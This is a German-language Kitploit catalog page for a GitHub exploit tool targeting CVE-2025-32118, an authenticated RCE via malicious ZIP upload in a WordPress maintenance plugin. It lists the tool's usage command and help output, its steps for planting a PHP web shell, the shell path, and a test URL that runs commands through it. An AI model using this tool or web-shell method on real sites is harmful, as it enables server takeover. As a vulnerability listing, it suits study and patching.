Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-32118 — WordPress CMP – Coming Soon & Maintenance Plugin <= 4.1.13 - Remote Code Execution (RCE) Sicherheitslücke | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-32118
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubnxploited/cve-2025-32118

CVE-2025-32118

WordPress CMP – Coming Soon & Maintenance Plugin <= 4.1.13 - Remote Code Execution (RCE) Sicherheitslücke

Repository anzeigen
11vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🚀 CVE-2025-32118 - WordPress-CMP-Plugin RCE-Exploit

🔍 Titel: WordPress CMP – Coming Soon & Maintenance Plugin <= 4.1.13 - Remote Code Execution (RCE)
🗓️ Veröffentlicht: 2025-04-04
🔐 CWE: CWE-434 - Uneingeschränkter Upload von Dateien mit gefährlichem Typ
📊 CVSS: 9.1 (KRITISCH) — CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H


📜 Beschreibung

Im CMP – Coming Soon & Maintenance-Plugin für WordPress (<= 4.1.13) besteht eine kritische Remote-Code-Execution-Schwachstelle (RCE).
Diese Schwachstelle erlaubt es einem authentifizierten Admin-Benutzer, schadhafte ZIP-Dateien mit ausführbaren PHP-Shells hochzuladen, was zu einer vollständigen Kompromittierung der Website führt.


💥 Auswirkungen

  • Upload von beliebigem PHP-Code in das Plugin-Verzeichnis
  • Uneingeschränkte Ausführung von Systembefehlen über eine Web-Shell
  • Potenzielle vollständige Übernahme des Servers

⚙️ Voraussetzungen

  • WordPress-Website mit installiertem verwundbarem CMP-Plugin (<= 4.1.13)
  • Gültige WordPress-Admin-Anmeldedaten (Authentifizierung erforderlich)

💻 Verwendung

root@kitploit:~
python3 CVE-2025-32118.py -u http://target-site.com/wordpress -un admin -p password

✍️ Verwendung (CLI-Hilfeausgabe)

root@kitploit:~
usage: CVE-2025-32118.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit For CVE-2025-32118 : By Nxploited - Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Base URL of WordPress site
  -un, --username USERNAME   Admin username
  -p, --password PASSWORD    Admin password

📌 Argumente:

FlagBeschreibung
-uBasis-URL der WordPress-Website
-unBenutzername
-pPasswort

🧪 Was es tut:

  1. Authentifiziert sich beim WordPress-Admin-Panel.
  2. Ruft eine gültige nonce für die Upload-Anfrage ab.
  3. Erstellt eine schadhafte ZIP-Datei mit:
    • style.css (gültiges Theme-Format)
    • nxploitedshell.php (RCE-Payload)
  4. Lädt die ZIP-Datei über die verwundbare Theme-Upload-Funktion hoch.
  5. Überprüft die Shell durch das Ausführen von ?cmd=whoami.

📂 Shell-Speicherort

Nach erfolgreichem Upload befindet sich die Shell unter:

root@kitploit:~
/wp-content/plugins/cmp-premium-themes/nxploitedshell/nxploitedshell.php

Teste sie über:

root@kitploit:~
http://target-site.com/wp-content/plugins/cmp-premium-themes/nxploitedshell/nxploitedshell.php?cmd=id

❗ Haftungsausschluss

Dieser Exploit dient ausschließlich Bildungszwecken.
Die unbefugte Verwendung dieses Codes gegen Systeme, die dir nicht gehören ist illegal und unethisch.


🔗 Referenz

  • CVE-2025-32118 auf MITRE
  • CWE-434: https://cwe.mitre.org/data/definitions/434.html

✒️ Von:

Nxploited | Khaled Alenazi

Tool herunterladen